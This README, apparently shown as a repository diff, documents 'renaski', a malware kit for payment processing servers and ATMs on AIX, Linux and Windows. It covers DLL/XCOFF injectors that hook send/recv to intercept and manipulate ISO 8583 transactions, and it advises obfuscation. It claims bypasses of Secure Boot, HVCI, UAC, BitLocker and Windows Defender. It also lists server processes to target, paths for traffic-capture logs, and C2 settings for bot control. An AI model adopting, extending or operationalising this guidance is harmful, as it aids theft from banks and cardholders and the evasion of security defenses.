Yuragy/Payment-Processing-Switcher/README.md

 	- renaski1.0.cpp: Basic code for Windows that integrates with the injector.

 Universal XCOFF/DLL configuration for processing servers and ATMs (AIX/Linux/Windows)

+The AIX version is exclusively for attacks on processing servers using renaski.xcoff together with InjectorAIX.
+The Windows version targets both local machines and processing servers (with server modifications).
+Works with renaski.dll and Kerl or renaski.dll and InjectorW.

+InjectorW is an alternative to Bootkit's built-in injector, allowing implementation with superuser privileges, which is important for processing servers without Bootkit.

+1. Verify server and ATM configurations
+	- Determine the entry points of the recv and send functions, such as WINAPI send/recv for Windows or system calls for UNIX-like.
+	- Use GDB or strace for Linux/AIX and WinDbg for Windows to analyze the functionality, entry points, and implementation process.
+	- The malware runs with superuser privileges, which allows directory creation and execution of system commands.

+2. Encryption and security
+	- AES-128 encryption in CBC mode with fixed IV and XOR protection is used.
+Dynamic encryption with unique keys for each transaction or session is recommended.
+	- Built-in security bypass mechanisms: Secure Boot bypass, Ring-0 protection, kernel-level protections prevent antivirus detection.
+	- When transmitting ISO 8583 in encrypted form, ensure that it is decrypted correctly before processing.

+3. Code obfuscation and protection
+	- Obfuscate code before compilation to make it difficult to analyze and reverse-engineer, especially for encryption keys, traffic interception functions, and transaction manipulation.
+	- The code uses dynamic API calls and mechanisms to bypass defenses, making it harder to detect.

+4. Defense Bypass Mechanisms
+	- Enabled:
+	- HVCI bypass
+	- UAC bypass
+	- Secure Boot bypass
+	- BitLocker bypass
+	- Windows Defender bypass (in-memory driver patching)
+	- Allow malware to operate at kernel level and avoid removal.

+5. Bootkit/Injector DLL

+The program complex consists of two components:
+	- An agent on the target device.
+	- A web interface to control the bots and automatically inject the DLL into the process on the server.

+6. List of processes on processing servers

+AIX/Linux:
+	- Transaction Processing:
+	- TPMMainProc
+	- TransactionManager
+	- ProcessServer
+	- Networking:
+	- NetDaemon
+	- CommService
+	- NetHandler
+	- fork()
+	- System Administration:
+	- SysMgmtDaemon
+	- ResManager
+	- SysMonitor

+Windows:
+	- Transaction Processing:
+	- TransactServer
+	- ProcManager
+	- SQLService
+	- Networking:
+	- NetworkService
+	- NetComm
+	- RPCSS
+	- Azure Service Bus
+	- System Administration:
+	- WinMgmt
+	- TaskManager
+	- PerfMon
+	- Azure Traffic Manager

+7. Logging and intercepting traffic:
+	- Windows: C:\intels\Drivers\\.
+	- AIX/Linux: /var/log/cas/
+	- Files:
+	- spvmdl.dat - API interception logs
+	- TMPS.dat, TMPR.dat - sent and received messages
+	- spc.dat - metadata of encrypted messages

+8. Configuration settings:
+	- config.c for Bootkit and info.ini for Linux/AIX and Windows.
+	- In config.c parameters are set, e.g. C2 server (host or IP) before compilation.